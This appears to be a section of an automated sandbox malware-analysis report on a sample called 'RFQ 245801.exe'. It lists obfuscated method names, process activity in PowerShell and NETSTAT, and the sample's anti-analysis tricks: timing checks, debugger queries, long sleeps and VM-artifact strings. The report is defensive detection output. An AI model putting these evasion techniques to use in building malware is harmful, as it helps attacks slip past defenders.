          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, evvAxakZCXhQan771b.cs High entropy of concatenated method names: 'aIk54VadLJ', 'Nbf5FjKw2t', 'RfX57YrIuA', 'mpp5i3MNfy', 'lno5BT7OIy', 't4n5acvJ2d', 'g7R5ua68Be', 'AlQ5VPS99b', 'kDtBkR8uAVrZKHOY2Id', 'GpEC038ZD19lmOGhD9y'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, GwxhdMvE70alVQgO2H.cs High entropy of concatenated method names: 'puuD1Nwm8k', 'WpHD8aBqTC', 'hyBDpnN38A', 'SbZDjD26aV', 'tM9DGV4vix', 'UfxD5ZDZlq', 'AmdDMBwBBs', 'GcVDx6k9Zj', 'QqeDNcu62U', 'autDEPkuYU'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, wIPVxezBCi6yaK1kDK.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LcIAqNUlOE', 'zBxAKH4HpO', 'gsvAnKF9Mn', 'CO1Afyw5KG', 'Xj3AXDoIV6', 'E6jAArOjW2', 'AbSASMQIUG'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Vj1PsPUkKgHXmyWVAr.cs High entropy of concatenated method names: 'BawXwvSkbc', 'ih9X0FXu8r', 'MYOX3LV9cK', 'Hv0XLo72cx', 'qW1Xm4gn28', 'PohXtX2TN7', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, cR2wkeeEmUg7K1hb5P.cs High entropy of concatenated method names: 'FCMKv4lKoN', 'MNgKR96FkT', 'NbgKmpTRG2', 'q9aKIMJtVF', 'leFK0i1gBY', 'l1eK3DrWLC', 'IPbKLXXxrK', 'NUiKtLrNHM', 'tg7K6U86V8', 'rjNKrg6AQb'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, JX4i456yo2MKdam2oZ.cs High entropy of concatenated method names: 'OUp51orFpZ', 'p2y5pnUJm3', 'Utf5G8m17e', 'CMY5MFhInp', 'y7A5xQCsAS', 'YbZGTExH0a', 'zy6GYJvG5T', 'yGQGWEC9Es', 'xVVGl35cyR', 'wt8GsOoNO7'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, QocsAcjbV9qKLZWBRE.cs High entropy of concatenated method names: 'Dispose', 'dBYksuBA4K', 'QJ990SyyKW', 'h0xyywG70G', 'co5kgiMbkc', 'N9pkz0G8J7', 'ProcessDialogKey', 'aAF9oriXPN', 'NLY9kKdbmC', 'pKE9930rop'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, R6B0AfnmHiIFCScC9n.cs High entropy of concatenated method names: 'qpyqb2KokD', 'D9cquH8ibZ', 'JM0qwlYFq0', 'N81q0BAd8g', 'NSQqLPa1LM', 'gOQqtoT16X', 'vkBqrQGOE7', 'i73qhl9v7d', 'z0jqvYH8EV', 'vfLqeQ9Ju4'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, gj4fiq0cbqS67yHNi8.cs High entropy of concatenated method names: 'FFJX8bUwFZ', 'KjWXpTNfWP', 'Pe1XjOjOmA', 'ynMXGulk6v', 'W7VX5hcGlQ', 'SmIXMp79sm', 'TSIXxoeoNp', 'ySuXN4Iv1E', 'QKDXE1uiIC', 'ySyXdfqKBw'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, BtID8LccH7jVfw8BjuT.cs High entropy of concatenated method names: 'ToString', 'kakSDgaZVr', 'CepSHrSoui', 'JJRS1Olgiu', 'fhYS85fMWI', 'J2jSpIvDP4', 'MQaSjTY9Qu', 'pw6SGks02G', 'xQOLxWFKfC6n3r966wl', 'xjBLoAFjco7dYnTLoEh'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, AWHXGwJvdG0koSWdHq.cs High entropy of concatenated method names: 'hLbAkYSVsD', 'ECLADBxr0X', 'jOoAH9fKyk', 'FHyA8HHOCJ', 'dLUApwRvFv', 't5WAGyaeSw', 'SmQA5jZAr9', 'l1LXWxhQnD', 'bQJXlnAfcN', 'NV8Xs3JRTB'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, jou9lSc2pb66G6VFaAF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgESmlorLN', 'huqSIAl9rd', 'rGrScfC6bb', 'jbXSP1v4BH', 'dUfSTlXA53', 'DIjSYW6ZPj', 'zyiSWIcUeQ'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, EOWlqHciZCVwJpnRUia.cs High entropy of concatenated method names: 'lCeAFxrg5Q', 'yq9AJfgBpr', 'gxpA7cv29g', 'OgaAi8lo5U', 'xcCA2ExvA3', 'qSeABp98hR', 'LZwAaKqk5A', 'FaEAbbqqob', 'oIuAukOBQo', 'OCrAV6PB7S'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, eXGkH9PtNjZJJbc2dM.cs High entropy of concatenated method names: 'Em6kMFoAPf', 'D61kxAfQRw', 'sPTkEmcsg9', 'i8Mkdnesh8', 'tvdkKTUhoV', 'OuOknGTlgA', 'LLnhmds5VmAinjOmDO', 'SWnWoMU5KNBUdliNpB', 'fYokkOfZnt', 'ej8kDCydEd'
          Source: 0.2.RFQ 245801.exe.3bf1af0.1.raw.unpack, Y5N6j8ZlrgTP7fUCew.cs High entropy of concatenated method names: 'E7LM8IywVu', 'DteMj1sF8F', 'esDM5AUOi5', 'U7e5gYkNob', 'Jxk5zBx8p2', 'FHnMowkt8I', 'WjCMkL3STR', 'HSGM9kdSGy', 'nYEMDVt4r5', 'b8MMHS0PFs'

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\Desktop\RFQ 245801.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: Yara matchFile source: Process Memory Space: RFQ 245801.exe PID: 6716, type: MEMORYSTR
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\RFQ 245801.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ 245801.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 26A9904 second address: 26A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 26A9B7E second address: 26A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 1130000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 2B00000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 2900000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 7780000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 8780000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 8930000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: 9930000 memory reserve | memory write watch
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6540
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3199
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2152
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7787
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 3812
          Source: C:\Windows\SysWOW64\NETSTAT.EXEWindow / User API: threadDelayed 6160
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_6-13813
          Source: C:\Users\user\Desktop\RFQ 245801.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\NETSTAT.EXEAPI coverage: 2.0 %
          Source: C:\Users\user\Desktop\RFQ 245801.exe TID: 6772Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep count: 2152 > 30
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep time: -4304000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep count: 7787 > 30
          Source: C:\Windows\explorer.exe TID: 6476Thread sleep time: -15574000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep count: 3812 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep time: -7624000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep count: 6160 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 3624Thread sleep time: -12320000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000006.00000002.4157421659.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000006.00000002.4156756426.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000006.00000000.1743773191.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4156756426.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3116314760.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000006.00000000.1745616106.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000006.00000002.4151697507.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000006.00000000.1743773191.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_00409AB0 rdtsc 5_2_00409AB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0040ACF0 LdrLoadDll,5_2_0040ACF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h]5_2_017F4164
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4164 mov eax, dword ptr fs:[00000030h]5_2_017F4164
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B8158 mov eax, dword ptr fs:[00000030h]5_2_017B8158
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726154 mov eax, dword ptr fs:[00000030h]5_2_01726154
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C156 mov eax, dword ptr fs:[00000030h]5_2_0171C156
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov ecx, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B4144 mov eax, dword ptr fs:[00000030h]5_2_017B4144
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750124 mov eax, dword ptr fs:[00000030h]5_2_01750124
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov ecx, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CA118 mov eax, dword ptr fs:[00000030h]5_2_017CA118
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E0115 mov eax, dword ptr fs:[00000030h]5_2_017E0115
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov eax, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CE10E mov ecx, dword ptr fs:[00000030h]5_2_017CE10E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017501F8 mov eax, dword ptr fs:[00000030h]5_2_017501F8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F61E5 mov eax, dword ptr fs:[00000030h]5_2_017F61E5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E1D0 mov eax, dword ptr fs:[00000030h]5_2_0179E1D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E61C3 mov eax, dword ptr fs:[00000030h]5_2_017E61C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A019F mov eax, dword ptr fs:[00000030h]5_2_017A019F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A197 mov eax, dword ptr fs:[00000030h]5_2_0171A197
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01760185 mov eax, dword ptr fs:[00000030h]5_2_01760185
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DC188 mov eax, dword ptr fs:[00000030h]5_2_017DC188
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4180 mov eax, dword ptr fs:[00000030h]5_2_017C4180
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174C073 mov eax, dword ptr fs:[00000030h]5_2_0174C073
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01722050 mov eax, dword ptr fs:[00000030h]5_2_01722050
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6050 mov eax, dword ptr fs:[00000030h]5_2_017A6050
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6030 mov eax, dword ptr fs:[00000030h]5_2_017B6030
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A020 mov eax, dword ptr fs:[00000030h]5_2_0171A020
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C020 mov eax, dword ptr fs:[00000030h]5_2_0171C020
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E016 mov eax, dword ptr fs:[00000030h]5_2_0173E016
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A4000 mov ecx, dword ptr fs:[00000030h]5_2_017A4000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C2000 mov eax, dword ptr fs:[00000030h]5_2_017C2000
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C0F0 mov eax, dword ptr fs:[00000030h]5_2_0171C0F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017620F0 mov ecx, dword ptr fs:[00000030h]5_2_017620F0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0171A0E3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A60E0 mov eax, dword ptr fs:[00000030h]5_2_017A60E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017280E9 mov eax, dword ptr fs:[00000030h]5_2_017280E9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A20DE mov eax, dword ptr fs:[00000030h]5_2_017A20DE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E60B8 mov eax, dword ptr fs:[00000030h]5_2_017E60B8
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E60B8 mov ecx, dword ptr fs:[00000030h]5_2_017E60B8
